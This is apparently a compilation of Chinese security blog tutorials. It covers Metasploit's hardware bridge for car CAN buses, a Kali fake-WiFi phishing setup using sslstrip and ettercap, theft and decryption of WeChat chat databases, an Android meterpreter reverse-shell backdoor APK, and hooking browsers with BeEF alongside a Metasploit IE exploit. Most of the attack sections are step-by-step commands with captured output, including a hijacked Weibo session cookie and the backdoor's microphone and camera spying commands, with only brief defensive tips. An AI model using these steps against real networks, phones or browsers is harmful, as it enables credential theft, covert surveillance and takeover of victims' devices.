Metasploit 支持IoT安全测试

metasploit

Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。

2003年,H.D. Moore发布Metasploit后,对目标进行“渗透测试”的似乎变得容易多了。2016年面对物联网领域的安全威胁,Metasploit似乎一直“束手无策”,弄得小伙伴们十分失望。

snip20170208_2

近日,Rapid7 公布已更新 Metasploit 框架,支持物联网硬件的安全测试啦~~~~

本周,Rapid7博客宣布包括现代汽车控制器局域网CAN、物联网IoT设备以及工业控制系统在内的硬件,都可以通过Metasploit进行渗透测试。

这个名为“Hardware Bridge API”的扩展,让Metasploit成为首个“通杀”软件与硬件的渗透测试神器。它使用无线通讯并通过突破了之前用于阻止渗透测试的网络限制、直接控制硬件,同时它还解决了开发者需要为不同硬件打造定制工具的麻烦。

Rapid7的安全研究人员 Craig Smith称:设备制造者可以通过两种方式与Metasploit进行连接。一种是将Metasploit直接接入固件;另一种则是创建一个中继服务,特别是当设备无法使用以太网,例如软件定义无线电的设备只能通过USB端口连接。

HWBridge API的核心功能包括收集设备性能信息、版本化数据或电量相关信息,以及用于测试不同物理设备的独立扩展。例如测试汽车控制器局域网络时,它能够支持CAN并提供几种用于进行渗透测试的相关指令。

应用举例:

新发布的版本支持SocketCAN。如果你有Linux系统和支持SocketCAN的CAN总线嗅探器就可以进行测试了。local_hwbridge模块就是个简易中继服务的示例,你可以在本地或者远程服务器运行。

msf > use auxiliary/server/local_hwbridge
msf auxiliary(local_hwbridge) > run
[*] Auxiliary module execution completed
[*] Using URL: http://0.0.0.0:8080/6xOv7GqFs3YTeIE
[*] Local IP: http://10.1.10.21:8080/6xOv7GqFs3YTeIE
[*] Server started.
msf auxiliary(local_hwbridge) >

local_hwbridge模块默认会检测任何SocketCAN数据,不需要输入任何选项。中继服务无需在Metasploit中运行。如果硬件本身支持REST API的话就可以跳过这步。

msf > use auxiliary/client/hwbridge/connect
msf auxiliary(connect) > set rhost 10.1.10.21
rhost => 10.1.10.21
msf auxiliary(connect) > set targeturi 6xOv7GqFs3YTeIE
targeturi => 6xOv7GqFs3YTeIE
msf auxiliary(connect) > run
[*] Attempting to connect to 10.1.10.21...
[*] Hardware bridge interface session 1 opened (127.0.0.1 -> 127.0.0.1) at 2017-01-17 11:02:34 -0800
[+] HWBridge session established
[*] HW Specialty: {"automotive"=>true}  Capabilities: {"can"=>true, "custom_methods"=>true}
[!] NOTICE:  You are about to leave the matrix.  All actions performed on this hardware bridge
[!]          could have real world consequences.  Use this module in a controlled testing
[!]          environment and with equipment you are authorized to perform testing on.
[*] Auxiliary module execution completed
msf auxiliary(connect) > sessions
 
Active sessions
===============
 
  Id  Type                   Information  Connection
  --  ----                   -----------  ----------
  1   hwbridge cmd/hardware  automotive   127.0.0.1 -> 127.0.0.1 (10.1.10.21)

设备连接后,就会建立一个HWBridge会话。如果你比较熟悉meterpreter的话,你就会习惯使用hwbridge。你可以输入help获取命令列表,或者运行指定模块如getvinfo(获取汽车信息)。

msf auxiliary(connect) > sess 1
[*] Starting interaction with 1...
hwbridge > supported_buses
Available buses
 
can0, can1, can2
 
hwbridge > run post/hardware/automotive/getvinfo CANBUS=can2
[*] Available PIDS for pulling realtime data: 46 pids
[*]   [1, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13, 14, 15, 16, 17, 19, 20, 21, 24, 25, 28, 31, 32, 32, 33, 44, 45, 46, 47, 48, 49, 50, 51, 60, 61, 64, 65, 66, 67, 68, 69, 70, 71, 73, 74, 76]
[*]   MIL (Engine Light) : OFF
[*]   Number of DTCs: 0
[*]   Engine Temp: 48 °C / 118 °F
[*]   RPMS: 0
[*]   Speed: 0 km/h  /  0.0 mph
[*] Supported OBD Standards: OBD and OBD-II
[*] Mode $09 Vehicle Info Supported PIDS: [2, 4, 6, 8]
[*] VIN: 1G1ZT53826F109149
[*] Calibration ID: UDS ERR: {"RCRRP"=>"Request Correctly Received, but Response is Pending"}
[*] PID 6 Response: ["00", "00", "C4", "E9", "00", "00", "17", "33", "00", "00", "00", "00"]
[*] PID 8 Response: ["00", "00", "00", "00", "00", "00", "00", "00", "00", "00", "00", "00", "00", "00", "00", "00", "00"]

即将加入更多硬件模式

据悉,Metasploit 开源社区迄今已包含 1,600 漏洞和 3,300 模块,管理Metasploit工具的Rapid7公司表示,之后还会加入其他功能。

logo

详细信息请查阅:

http://opengarages.org/hwbridge/#get-a-list-of-methods

https://www.rapid7.com/about/press-releases/rapid7-enables-iot-hardware-security-testing-with-metasploit/

https://community.rapid7.com/community/transpo-security/blog/2017/02/02/exiting-the-matrix

http://www.darkreading.com/vulnerabilities—threats/metasploit-can-now-be-directly-linked-to-hardware-for-vulnerability-testing/d/d-id/1328047

按捺不住了吧,试试?O(∩_∩)O~

转自:

微信公众号:开源恶意代码基准测试

【实战】在Kali Linux中进行WIFI钓鱼 | How to create fake wifi hotspot with kali linux

 

Clipboard Image.png

0x00 实验环境

操作系统:Kali 1.0 (VM)

FackAP: easy-creds

硬件:NETGEAR wg111 v3 RTL8187B 网卡(kali下免驱)

Clipboard Image.png

靶机:安卓、iPhone设备

0x01 环境搭建

git clone https://github.com/brav0hax/easy-creds
cd easy-creds

Clipboard Image.png

bash install.sh

Clipboard Image.png

选择第一项:1.  Debian/Ubuntu and derivatives

Clipboard Image.png

这一步设定easy-creds的安装目录:/opt ,安装过程中会从国外网站下载一些依赖包以及第三方软件,这一过程中建议通过翻墙来节省时间。

当看到提示happy hunting的时候便意味着安装完成了:

Clipboard Image.png

0x02

根据上述步骤已将easy-creds安装到Kali中,我们可以在终端执行easy-creds运行,接下来我们需要对软件、系统参数进行一些修改:

2.1 修改etter uid、gid值 &开启iptables端口转发

kali中自带了中间人攻击的一些工具,如:ettercap,在第一次使用ettercap时,我们需要修改其默认配置文件/etc/ettercap/etter.conf: (有的系统中,ettercap的配置文件路径为:/etc/etter.conf)

Clipboard Image.png

需要我们把ettercap的ec_uid、ec_gid的值修改为0:

Clipboard Image.png

另外,如果系统使用了iptables防火墙,还需取消#后的注释使iptables配置生效,将:

# if you use iptables:
   #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

修改为:

# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

2.2 开启数据包转发:

echo 1 >> /proc/sys/net/ipv4/ip_forward

2.3 配置iptables规则:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 

2.4 运行sslstrip

sslstrip -l 8080

2.5 开启网络管理 &重启网络管理服务

vim /etc/NetworkManager/NetworkManager.conf

Clipboard Image.png

将managed=false修改为managed=true:

Clipboard Image.png

重启网络管理服务:

service network-manager restart

0x03 运行easy-creds

终端执行:easy-creds
选择第三项:FakeAP Attacks

Clipboard Image.png

选择第一项:FakeAP Attack Static

Clipboard Image.png

y确定包含sidejacking劫持攻击:

Clipboard Image.png

下一步选择WIFI网络的流量入口:eth0

Clipboard Image.png

选择无线网络接口&设备:wlan0

Clipboard Image.png

设定WIFI-SSID:CMCC

Clipboard Image.png

WIFI网络信道:5

Clipboard Image.png

mon0

Clipboard Image.png

n

Clipboard Image.png

at0

Clipboard Image.png

n

Clipboard Image.png

为无线网络设置网段:192.168.88.0/24

Clipboard Image.png

设定DNS服务器:8.8.8.8

Clipboard Image.png

完成之后,easy-creds启动了Airbase-NG、DMESG、SSLStrip、Ettercap tunnel、URL snarf、Dsniff等工具:

Clipboard Image.png

红色部分显示安卓、iPhone靶机成功连入钓鱼WIFI环境,URL snarf也捕获到了两台设备正在访问的网站网址等信息。

0x04 Hacking for fun

4.1 “绵羊墙”

driftnet是一款简单而使用的图片捕获工具,能够捕获到网络数据包中的图片,同时支持抓取和显示音频文件,可用于捕获微信朋友圈中的相片、微博配图等等。

driftnet -i at0   (-i指定监听的网络接口)

Clipboard Image.png

4.2 MITM中间人攻击

Ettercap利用ARP欺骗,监听同一网段内某台主机甚至所有主机的网络通信流量,抓取其它主机通信流量中的Cookie等信息:

ettercap -i at0 -T -M arp:remote /192.168.88.1/ //  (通过ARP欺骗,监听192.168.88.0/24 网段所有主机通信流量)

Clipboard Image.png

Clipboard Image.png

4.3 利用Cookie登陆受害者账户

利用Cookie前,我们需要下载浏览器的一些Cookie相关的插件,如cookie manager、cookie editor。

这里我使用了:Modify Headers for Google Chrome

Clipboard Image.png

4.3.1 捕获到的微博Cookie数据:

Wed Jul 20 11:27:50 2016
TCP  192.168.88.100:50664 --> 180.149.139.248:80 | AP

GET /unread?t=1468985586846 HTTP/1.1.
Host: m.weibo.cn.
Connection: keep-alive.
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X; zh-CN) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/13F69 UCBrowser/10.9.19.815 Mobile.
Cookie: H5_INDEX=3; H5_INDEX_TITLE=0xroot; SUB=_2A256ilXJDeTxGeVK7VAY8y3KyjiIHXVWdXuBrDV6PUJbkdBeLRb1kW2Qqy_JChRgGgUi-REU1X25o5jdzQ..; SUHB=0y0p0SAr00Gj3K; _T_WM=132ca5c49dea82a69fb16ebcdaae493a; gsid_CTandWM=4um4CpOz5VMlYWGOqKlx8ewRL9U.
Accept: application/json, text/javascript, */*; q=0.01.
X-Requested-With: XMLHttpRequest.
Accept-Language: zh-cn.
Referer: http://m.weibo.cn/.
Accept-Encoding: gzip,deflate.
.

4.3.2 清空浏览器内weibo.cn的Cookie:

Clipboard Image.png

4.3.3 导入微博Cookie

选择右上角+ 增加Cookie:

Action=Modify 
Name=Cookie 
Value=H5_INDEX=3; H5_INDEX_TITLE=0xroot; SUB=_2A256ilXJDeTxGeVK7VAY8y3KyjiIHXVWdXuBrDV6PUJbkdBeLRb1kW2Qqy_JChRgGgUi-REU1X25o5jdzQ..; SUHB=0y0p0SAr00Gj3K; _T_WM=132ca5c49dea82a69fb16ebcdaae493a; gsid_CTandWM=4um4CpOz5VMlYWGOqKlx8ewRL9U.

Clipboard Image.png

Clipboard Image.png

4.3.4 访问m.weibo.cn:

Clipboard Image.png

0x05 嗅探数据包&协议分析

5.1 wireshark

wireshark

5.2 tcpdump

tcpdump -i at0 -w sniffe.dump

5.3 ssltrips嗅探https加密流量

捕获HTTPS通信传输中的账号、密码:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
ssltrips -p -l 10000 -w log.txt

0x06 注意事项

1.easy-creds生成的日志文件过大,建议在/tmp目录中启动easy-creds(即使忘了删easy-creds日志,系统重启后自动清空/tmp目录)

2.如果连入钓鱼热点的设备不能联网了及时检查:/proc/sys/net/ipv4/ip_forward

cat /proc/sys/net/ipv4/ip_forward

当发现值为0的时候需再次执行:

echo 1 >> /proc/sys/net/ipv4/ip_forward

3.easy-creds目前不兼容kali 2.0,所以不建议在kali 2.0 系统中安装easy-creds;

0x07 安全建议

1.不随便连陌生 WIFI,及时注销登录状态可使Cookie时效;

2.不使用WIFI时及时关闭手机WIFI,避免自动连入诸如CMCC这一类的公共开放无线热点。

0x08 refer

Ettercap Man In The MIddle Attack + SSL Strip

移动安全:窃取微信聊天记录、Hacking Android with Metasploit

在这篇文章中我们将讨论如何窃取安卓、苹果设备中的微信聊天记录,并演示如何利用后门通过Metasploit对安卓设备进行控制。文章比较基础、可动手性强,有设备的童鞋不妨边阅读文章边操作,希望能激发大家对移动终端的安全兴趣。

(文章内容存在一定攻击性,目的在于普及终端安全知识、提高安全意识,如有非法使用,后果自负)

一:如何窃取Android、iPhone手机上的微信聊天记录?

0x00 条件:

安卓设备已获取root权限,安装SSHDroid(通过ssh、ftp连接手机)

Apple设备越狱,安装OpenSSH插件

0x01 安卓:

很多安卓手机的用户都会遇到这么一个尴尬的问题:手机用久了就不知不觉变得慢了,最后慢到什么都迟钝了。为了解决这个问题和大多数人一样我选择了root设备。

安卓设备在root以后可以对系统文件存在最高级别的操作权限。比如,你在安卓设备上安装了微信,那么root以后通过adb shell你能对微信App的文件配置进行读取修改等操作。

Android应用程序的数据库文件通常会保存在 /data/data/packagename/database 文件夹下,微信App文件存放路径为:/data/data/com.tencent.mm/MicroMsg

图片1.png

首先通过FTP把文件down到本地:

图片2.png

以34位编码(类似于乱码)命名的文件夹中可找到微信账号的加密数据库文件 :EnMicroMsg.db

图片3.png

用数据库管理器打开:提示加密或者不是数据库文件

图片4.png

这里可以用windows环境下的SQLite Database Browser浏览器打开:

图片5.png

 

提示输入密码:

图片6.png

那么,加密数据库使用的密码是什么呢?我们又该如何获取到这个密码?通过上网查资料了解到:微信采用手机的IMEI值和微信UIN值的组合来对数据进行加密。

微信账号uin:即user information 微信用户信息识别码,获取微信UIN的方式有两种:

1.通过微信app的“system_config_prefs.xml”配置文件获取微信账号uin;

2.通过抓取WEB版微信聊天的数据包获取到uin。

1.1 App 配置文件

find / -name “system_config_prefs.xml”

图片7.png

/data/data/com.tencent.mm/shared_prefs/system_config_prefs.xml
cat /data/data/com.tencent.mm/shared_prefs/system_config_prefs.xml | grep uin

Clipboard Image.png

<int name="default_uin" value="146****21" />

1.2 谷歌chrome浏览器登陆WEB版微信:

图片8.png

登陆后新建窗口并访问chrome://net-internals/#events

发送信息 抓包 find uin值

图片9.png

uin:146****21

图片10.png

通过上述两种方法找到的uin值是相同的。

安卓拨号界面输入*#06#获得手机IMEI码:354**********85

SIM值+uin值组合即为146****21354**********85

md5: http://www.spriteking.com/cmd5/ 左侧加密

Clipboard Image.png

得到32位小写md5值:a1edf9f5********************b5e5

取其前七位:a1edf9f输入到sql浏览器中,成功打开微信的数据库文件:

图片12.png

图片13.png

0x02 苹果:

Apple设备越狱后可通过Cydia安装各种小插件,通常情况我会安装OpenSSH来使自己能通过终端连接到Apple设备中,并使用sftp传输文件:

IMG_0716.JPG

iOS中,应用文件夹以hash值命名,要导出微信、QQ的聊天记录其难度相对安卓来说稍微复杂很多。

在实际操作中我们可以通过巧用Linux命令(find、grep、xargs)来绕过这些坑。

find /var/mobile/Containers/Data -name "MM.sqlite" 

mkdir /cache
find /var/mobile/Containers/Data -name "MM.sqlite" |xargs -I {} dirname {} | xargs -I {} cp -r  {}/../../ /cache

在越狱iOS窃取隐私可参考:帮女神修手机的意外发现:隐匿在iOS文件系统中的隐私信息 一文

0x03 在安卓终端植入后门

3.1 实验环境

Kali Linux(Hack):192.168.31.213

Android(靶机):192.168.31.118

3.2生成后门文件:

cd Desktop
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.31.213 LPORT=443 R >0xroot.apk

Clipboard Image.png

3.3 运行metasploit控制台

msfconsole

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.31.213
set LPORT 443
run

Clipboard Image.png

3.4 安装&运行后门App

Screenshot_2016-06-27-14-04-48.pngScreenshot_2016-06-28-15-50-59.png

后门能进行什么操作?我们来看看usage:

meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information about active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    help                      Help menu
    info                      Displays information about a Post module
    interact                  Interacts with a channel
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    use                       Deprecated alias for 'load'
    write                     Writes data to a channel

Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory

Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table

Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getuid        Get the user that the server is running as
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS

Stdapi: Webcam Commands
=======================

    Command       Description
    -------       -----------
    record_mic    Record audio from the default microphone for X seconds
    webcam_list   List webcams
    webcam_snap   Take a snapshot from the specified webcam

record_mic 通过手机麦克风进行窃听、录音;

webcam_list 列出安卓设备的所有摄像头;

webcam_snap 通过摄像头进行偷拍…

等等

0x04 演示视频

http://v.qq.com/iframe/player.html?vid=e0309wvais4&tiny=0&auto=0

0x05 APK后门分析:

把apk放到apk分析工具(apkStudio、Bytecodeviewer)进行解包,我们来看看后门App的源码:

Clipboard Image.png

(apkStudio)

在smali/com/metasploit/stage/MainActivity.smali中我们可以找到后门服务器的ip端口配置:

1111.png

(apkStudio)

Clipboard Image.png

(Bytecodeviewer)

0x06 预防&安全建议

安卓:从可信来源下载应用程序,避免感染恶意程序;在移动充电桩充电前及时关闭USB调试。

苹果:越狱后及时修改root密码,避免使用默认密码、弱口令。

0x07 文中工具下载地址:

SQLite Database Browserhttp://pan.baidu.com/s/1nuWlDgd

SSHDroid:http://pan.baidu.com/s/1b6PBK6

0×08 参考&感谢

How To Decrypt WeChat EnMicroMsg.db Database?

Android微信数据导出

微信聊天记录分析

A look at WeChat security

https://gist.github.com/scturtle/7248017

帮女神修手机的意外发现:隐匿在iOS文件系统中的隐私信息

Hacking Android Smartphone Tutorial using Metasploit

Kali Linux渗透测试:Metasploit与Beef联动打入企业内网

t0153df974d9d0f5809.jpg

0x01:科普

Beef目前欧美最流行的WEB框架攻击平台,全称:The Browser Exploitation Framework Project. Beef利用简单的XSS漏洞,通过一段编写好的JavaScript(hook.js)控制目标主机的浏览器,通过目标主机浏览器获得该主机的详细信息,并进一步扫描内网,配合metasploit绝对是内网渗透一大杀器。

官网 http://beefproject.com/

博客 http://blog.beefproject.com/

0x02安装

Kali linux 系统默认未安装beef,需要自行安装。

apt-get update
apt-get install beef-xss

0x03入门

0x03.1启动

主目录:

/usr/share/beef-xss

cd /usr/share/beef-xss

./beef

t01287a4dec5cc49b91.png

t0178b9b1ea09d0e72b.png

127.0.0.1:3000/ui/pannel

账号密码

beef/beef

t01fac022bc1ad5e4aa.png

demos:Beef-Xss ip:3000/demos/butcher/index.html

测试两台主机网络通信是否正常:

t011e6491eb9aafbd00.png

访问Beef demo页面

t01dc43ebf9a8fb188b.png

demo页面嵌入了hook.js 访问>中招

0x04挂马:

在正常页面添加script标签,嵌入恶意脚本

t01bd3f243cd506ca12.png

在实际渗透中(需要一个公网的IP),如何让受害者访问我们嵌有hook.js的页面呢?

网站反馈页面,举报页面案例:用Xss平台沦陷百度投诉中心后台

当然,这位同学用的是Xss平台,而不是beef,利用Beef的话,不仅能得到后台管理员的Cookie,再配合Metasploit,还能以管理员主机浏览器当做跳板,进入公司内网。

Online Browersers->右击->Use As Proxy

http://p5.qhimg.com/t0107cb7746a23e6d35.jpg

再配合ARP攻击,MITM中间人攻击,对内网内所有Http请求重定向基本…(这里露出一个你懂的WS笑容)

Beef后台检测到有主机上线(感觉好像当年玩的灰鸽子、上兴 =。= 囧)

t016bd52ff0f6e09d92.png

通过浏览器,我们可以看到目标主机的很多信息:

浏览器信息:
名称
版本
Browser UA String
Browser Platform
Windows size
插件基本信息:
Flash
VBS脚本
Web Sock
Quick Time
...
Api信息
Cookie
操作系统信息
Date 时间日期
硬件信息
Cpu (32/64)
屏幕分辨率
是否支持触屏

And So On

用火狐浏览器测试

t0191ac372d53212d0d.png

t011909d221bef87b75.png

Beef功能模块组件

http://p6.qhimg.com/t013e83e9938073faa9.jpg

常用功能/模块

Browser:获取浏览器信息
--Hooked Domain
-----Get Cookie 获取客户端Cookie信息 执行一次命令在右边显示Cookie;
-----Get From Value 获取页面提交的表单信息:截获填写的银行卡信息、注册页面的用户名密码;
-----Redirect Browser 浏览器重定向

t011ca9c6d662701d53.jpg

执行后,目标浏览器访问任何网站都将会被重定向到bobao.360.cn,实际渗透的时候在内网实施ARP攻击,将内网所有Http请求流量重定向到嵌入了Hook恶意脚本的页面…(在这里露出一个淫荡的笑容)

Chrome Extensions:
Debug:测试Http请求
Exploits:利用浏览器漏洞进行攻击
Host:获取受害者主机信息
Mtasploit:结合Metasploit进行渗透,这个也是本文的重点。
Network:进行Doser、ping、DNS枚举、端口扫描等等
Social Enhineering:社工模块

0x05与Metasploit联动

Beef配置文件

/usr/share/beef-xss/config.yaml

  metasploit:
enable: false

改成

metasploit:
enable: true
vim /usr/share/beef-xss/config.yaml
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file
beef:
    version: '0.4.4.5-alpha'
    debug: false
    restrictions:
        # subnet of browser ip addresses that can hook to the framework
        permitted_hooking_subnet: "0.0.0.0/0"
        # subnet of browser ip addresses that can connect to the UI
        # permitted_ui_subnet: "127.0.0.1/32"
        permitted_ui_subnet: "0.0.0.0/0"
    http:
        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
        host: "0.0.0.0"
        port: "3000"
        # Decrease this setting up to 1000 if you want more responsiveness when sending modules and retrieving results.
        # It's not advised to decrease it with tons of hooked browsers (more than 50),
        # because it might impact performance. Also, enable WebSockets is generally better.
        xhr_poll_timeout: 5000
        # if running behind a nat set the public ip address here
        #public: ""
        #public_port: "" # port setting is experimental
        # DNS
        dns_host: "localhost"
        dns_port: 53
        panel_path: "/ui/panel"
        hook_file: "/hook.js"
        hook_session_name: "BEEFHOOK"
        session_cookie_name: "BEEFSESSION"
        # Allow one or multiple domains to access the RESTful API using CORS
        # For multiple domains use: "http://browserhacker.com, http://domain2.com"
        restful_api:
            allow_cors: false
            cors_allowed_domains: "http://browserhacker.com"
        # Prefer WebSockets over XHR-polling when possible.
        websocket:
          enable: false
          secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
          port: 61985 # WS: good success rate through proxies
          secure_port: 61986 # WSSecure
          ws_poll_timeout: 1000 # poll BeEF every second
        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
        web_server_imitation:
            enable: true
            type: "apache" #supported: apache, iis
        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
        https:
            enable: false
            # In production environments, be sure to use a valid certificate signed for the value
            # used in beef.http.dns_host (the domain name of the server where you run BeEF)
            key: "beef_key.pem"
            cert: "beef_cert.pem"
    database:
        # For information on using other databases please read the
        # README.databases file
        # supported DBs: sqlite, mysql, postgres
        # NOTE: you must change the Gemfile adding a gem require line like:
        #   gem "dm-postgres-adapter"
        # or
        #   gem "dm-mysql-adapter"
        # if you want to switch drivers from sqlite to postgres (or mysql).
        # Finally, run a 'bundle install' command and start BeEF.
        driver: "sqlite"
        # db_file is only used for sqlite
        db_file: "db/beef.db"
        # db connection information is only used for mysql/postgres
        db_host: "localhost"
        db_port: 5432
        db_name: "beef"
        db_user: "beef"
        db_passwd: "beef123"
        db_encoding: "UTF-8"
    # Credentials to authenticate in BeEF. Used by both the RESTful API and the Admin_UI extension
    credentials:
        user:   "beef"
        passwd: "beef"
    # Autorun modules as soon the browser is hooked.
    # NOTE: only modules with target type 'working' or 'user_notify' can be run automatically.
    autorun:
        enable: true
        # set this to FALSE if you don't want to allow auto-run execution for modules with target->user_notify
        allow_user_notify: true
    crypto_default_value_length: 80
    # Enable client-side debugging
    client:
        debug: false
    # You may override default extension configuration parameters here
    extension:
        requester:
            enable: true
        proxy:
            enable: true
        metasploit:
            enable: true
        social_engineering:
            enable: true
        evasion:
            enable: false
        console:
             shell:
                enable: false
        ipec:
            enable: true
vim /usr/share/beef-xss/extensions/metasploit/config.yaml
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Enable MSF by changing extension:metasploit:enable to true
# Then set msf_callback_host to be the public IP of your MSF server
#
# Ensure you load the xmlrpc interface in Metasploit
# msf > load msgrpc ServerHost=10.211.55.2 Pass=abc123 ServerType=Web
# Please note that the ServerHost parameter must have the same value of host and callback_host variables here below.
# Also always use the IP of your machine where MSF is listening.
beef:
    extension:
        metasploit:
            name: 'Metasploit'
            enable: true
            host: "172.16.244.129"
            port: 55552
            user: "msf"
            pass: "abc123"
            uri: '/api'
            ssl: false
            ssl_version: 'SSLv3'
            ssl_verify: true
            callback_host: "172.16.244.129"
            autopwn_url: "autopwn"
            auto_msfrpcd: false
            auto_msfrpcd_timeout: 120
            msf_path: [ 
              {os: 'osx', path: '/opt/local/msf/'},
              {os: 'livecd', path: '/opt/metasploit-framework/'},
              {os: 'bt5r3', path: '/opt/metasploit/msf3/'},
              {os: 'bt5', path: '/opt/framework3/msf3/'},
              {os: 'backbox', path: '/opt/metasploit3/msf3/'},
              {os: 'win', path: 'c:\\metasploit-framework\\'},
              {os: 'custom', path: '/usr/share/metasploit-framework/'}
            ]

原:

 

{os: 'custom', path: ''}

修改成

{os: 'custom', path: '/usr/share/metasploit-framework/'}

修改 host callback_host两参数,改为beef主机IP

重启postgresq、metasploit、服务

service postgresql restart & service metasploit restart

t019e7cd4b2aa99d854.jpg

msfconsole #启动Metasploit
load msgrpc ServerHost=172.16.244.129 Pass=abc123

t0169debf48fbc3942a.jpg

重启Beef

t0190d651f583e54f3b.jpg

启动beef这里提示已经载入246个metasploit的EXP,MSF更新到最新版应该有五六百个EXP

进入Beef后台(莫名成了245 =。=!)

t01d5aa2f783869c7f9.jpg

use exploit/windows/browser/ie_execcommand_uaf
show options
set srvhost 172.16.244.129
exploit/run

t01418a1cdbd8c6e6a1.jpg

t01560b8713b2414391.jpg

靶机被强行跳转到被监听的URL

t0165e1ff04e684fc88.jpg

MSF成功监听到(但,貌似是虚拟机装的XP把这个漏洞补了,所以没产生session会话)

t01fcc6b6cff8f19f8c.jpg

如果XP没有打补丁,即存在这个EXP针对的漏洞,这里会产生一个session会话

session -i 1

t01645e28238ba42595.jpg

screenshot 截屏:截取遭钓鱼主机的屏幕到本地文件

sysinfo 查看系统信息

hashdump dump目标主机的用户Hash

0x06更多Meterpreter的命令

参考:

Meterpreter后渗透攻击命令

Metasploit工具Meterpreter的命令速查表

http://p4.qhimg.com/t01d1765f2cf024d362.png

上一篇 内网渗透一:利用Xss漏洞进入内网 的文章里,

0x01填坑:

我在这里填一下上一篇文章中的坑哈:

我们使用了exploit/windows/browser/ie_execcommand_uaf IE浏览器的这个EXP,但是执行之后发现目标主机虽然跳转了,但是有个报错:

(接第一篇)靶机被强行跳转到被监听的URL

t0165e1ff04e684fc88.jpg

MSF成功监听到

(但,貌似是虚拟机装的XP把这个漏洞补了,所以没产生session会话)

t01fcc6b6cff8f19f8c.jpg

过后查了这个原因好久,在Mickey牛的教导下,终于发现了报错的原因:

t01b39f5efd9cd3e70d.jpg

msf下输入 exploit/windows/browser/ie_execcommand_uaf

0x02找到问题:

执行info,查看该EXP的信息,发现这个EXP原来是针对XP SP3、Vista的IE7、IE8以及Win7的IE8、IE9。

msf exploit(ie_execcommand_uaf) > info
       Name: MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability 
     Module: exploit/windows/browser/ie_execcommand_uaf
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Good
Provided by:
  unknown
  eromang
  binjo
  sinn3r <sinn3r@metasploit.com>
  juan vazquez <juan.vazquez@metasploit.com>
Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   IE 7 on Windows XP SP3
  2   IE 8 on Windows XP SP3
  3   IE 7 on Windows Vista
  4   IE 8 on Windows Vista
  5   IE 8 on Windows 7
  6   IE 9 on Windows 7
Basic options:
  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  OBFUSCATE   false            no        Enable JavaScript obfuscation
  SRVHOST     172.16.244.129   yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT     8080             yes       The local port to listen on.
  SSL         false            no        Negotiate SSL for incoming connections
  SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
  SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH                      no        The URI to use for this exploit (default is random)
Payload information:
Description:
  This module exploits a vulnerability found in Microsoft Internet 
  Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object 
  gets deleted in an unexpected manner, but the same memory is reused 
  again later in the CMshtmlEd::Exec() function, leading to a 
  use-after-free condition. Please note that this vulnerability has 
  been exploited in the wild since Sep 14 2012. Also note that 
  presently, this module has some target dependencies for the ROP 
  chain to be valid. For WinXP SP3 with IE8, msvcrt must be present 
  (as it is by default). For Vista or Win7 with IE8, or Win7 with IE9, 
  JRE 1.6.x or below must be installed (which is often the case).
References:

http://cvedetails.com/cve/2012-4969/

http://www.osvdb.org/85532

http://www.microsoft.com/technet/security/bulletin/MS12-063.mspx

http://technet.microsoft.com/en-us/security/advisory/2757760

http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/

http://blog.vulnhunt.com/index.php/2012/09/17/ie-execcommand-fuction-use-after-free-vulnerability-0day/

